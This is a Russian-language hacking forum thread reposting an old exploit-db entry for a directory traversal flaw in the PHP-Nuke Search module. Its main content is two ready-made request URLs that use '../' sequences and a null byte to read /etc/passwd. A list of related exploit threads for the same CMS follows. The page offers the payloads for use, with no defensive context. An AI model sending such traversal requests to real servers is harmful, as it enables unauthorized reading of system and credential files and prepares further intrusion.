Exploit PHP-Nuke Search Module - 'modules.php' Directory Traversal

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 359 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

#1

EDB-ID: 26377

Проверка EDB

Пройдено

Автор: [email protected]

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: N/A

Дата публикации: 2005-10-19

Код:

source: https://www.securityfocus.com/bid/15137/info

PHPNuke Search Module is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input.

A remote attacker may view files that are only intended to be accessible to authenticated and authorized users. Information obtained may be used in further attacks. 

http://www.example.com/[nuke_dir]/modules.php?name=Search&file=../../../../../../../../../etc/passwd%00

http://www.example.com/[nuke_dir]/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../.
./../../etc/passwd

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit PHP-Nuke 7.7 EV Search Module - SQL Injection

Ответы: 0

Просмотры: 359

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Tru-Zone Nuke ET 3.x - Search Module SQL Injection

Ответы: 0

Просмотры: 337

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit PHP-Nuke Search Enhanced Module 1.1/2.0 - HTML Injection

Ответы: 0

Просмотры: 352

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit PHP-Nuke 7.8 Search Module - SQL Injection

Ответы: 0

Просмотры: 295

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit PHP-Nuke 5.6/6.0 - Search Engine SQL Injection

Ответы: 0

Просмотры: 360

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit PHP-Nuke 6.0/6.5 - Search Form Cross-Site Scripting

Ответы: 0

Просмотры: 336

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit PHP-Nuke 'Submit_News' Component - SQL Injection

Ответы: 0

Просмотры: 556

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injections

Ответы: 0

Просмотры: 530

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit PHP-Nuke 7.x - 'Block-Old_Articles.php' SQL Injection

Ответы: 0

Просмотры: 502

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit PHP-Nuke 0-7 - Delete God Admin Access Control Bypass

Ответы: 0

Просмотры: 495

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.